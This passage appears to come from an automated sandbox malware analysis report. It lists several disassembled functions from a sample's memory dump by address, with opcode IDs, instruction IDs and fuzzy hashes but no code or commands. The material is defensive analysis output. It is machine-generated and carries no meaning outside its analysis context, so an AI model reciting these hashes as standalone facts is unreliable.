                                            • Instruction Fuzzy Hash: 792141755093808FDB12CF24D9D4715BF72EB4A214F28C5DAD8498F6A7C33A980ACB62
                                            Function 01131356 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c54eb415c63562fec3725aa0f80e41edd88165d1c1286e3c811041199f83d83b
                                            • Instruction ID: 232fca05de335ff119c0cbf8e8f9befa6d11c5f5dbbc229374fd39616ceabad7
                                            • Opcode Fuzzy Hash: c54eb415c63562fec3725aa0f80e41edd88165d1c1286e3c811041199f83d83b
                                            • Instruction Fuzzy Hash: 9F11C470A44101ABEF3E276CE88432D3651EBC2321F000D29E40AC73CDDB29DC998742
                                            Function 01130848 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79b24961818457524848d9ef0054e85bcbc228c11c7d9509c151651f84782b50
                                            • Instruction ID: 4a31d3375ebfd373e5c02a63f5269694fccf1445bf89cee30d7e1e707f257bdf
                                            • Opcode Fuzzy Hash: 79b24961818457524848d9ef0054e85bcbc228c11c7d9509c151651f84782b50
                                            • Instruction Fuzzy Hash: C6118F30F002048FEF5DAA7DD44472A76D5EFC9214F2049B9F006DB29AEB65CC868BC1
                                            Function 01131460 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 707b99654477f9eba70b8c9f721264778b71089571bc6dcc30594e9db29d1729
                                            • Instruction ID: 177834f3c3c09ef71a79cf7ebfc5fadcbacf086cd46d8796a5f342125a639d9c
                                            • Opcode Fuzzy Hash: 707b99654477f9eba70b8c9f721264778b71089571bc6dcc30594e9db29d1729
                                            • Instruction Fuzzy Hash: AE014031B002159FCF29EFB984501AD7BF9EF88214B1504BAE905E7305E735D941CBA2
                                            Function 01138179 Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0a31a9520ffb38989791802a089d7fc1ed0fdf729bd87288817903403c2d560
                                            • Instruction ID: 96363adf04775461791c15abcbbb3af9af12c9bede6bc365ff8feef299f1a21c
                                            • Opcode Fuzzy Hash: f0a31a9520ffb38989791802a089d7fc1ed0fdf729bd87288817903403c2d560
                                            • Instruction Fuzzy Hash: 770121309402499FCB06FFB4F945A9D7BB9EF40304F5046A9C004DB25AEA71AE49C751
                                            Function 011314EC Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 31829646f45c511f35b8ef49d57db489226dde08fb18e0f6cbf156d2903e7523
                                            • Instruction ID: 5f02a8340ce8bee989505da8511745f0e9dafabb8b2fd3fabbaebba450c72fab
                                            • Opcode Fuzzy Hash: 31829646f45c511f35b8ef49d57db489226dde08fb18e0f6cbf156d2903e7523
                                            • Instruction Fuzzy Hash: 35F02B73E041509BDB298BA884901AC7FA0FEE922571A40D7D845DB25AD725D442C752
                                            Function 01138188 Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 47b5fd34401e91504763e86970dcf5cf71268f9c8ebacc04796dac2ab7abbe5a
                                            • Instruction ID: c6e312ee31eb2d37d274fe2d76d73a39c58d31e98e9de7629e60e30cbf51baad
                                            • Opcode Fuzzy Hash: 47b5fd34401e91504763e86970dcf5cf71268f9c8ebacc04796dac2ab7abbe5a
                                            • Instruction Fuzzy Hash: 6AF0BB349501499FCB06FBB8F945A9D7BB9EF40304F5046A8C005DB259EA71AE49CB91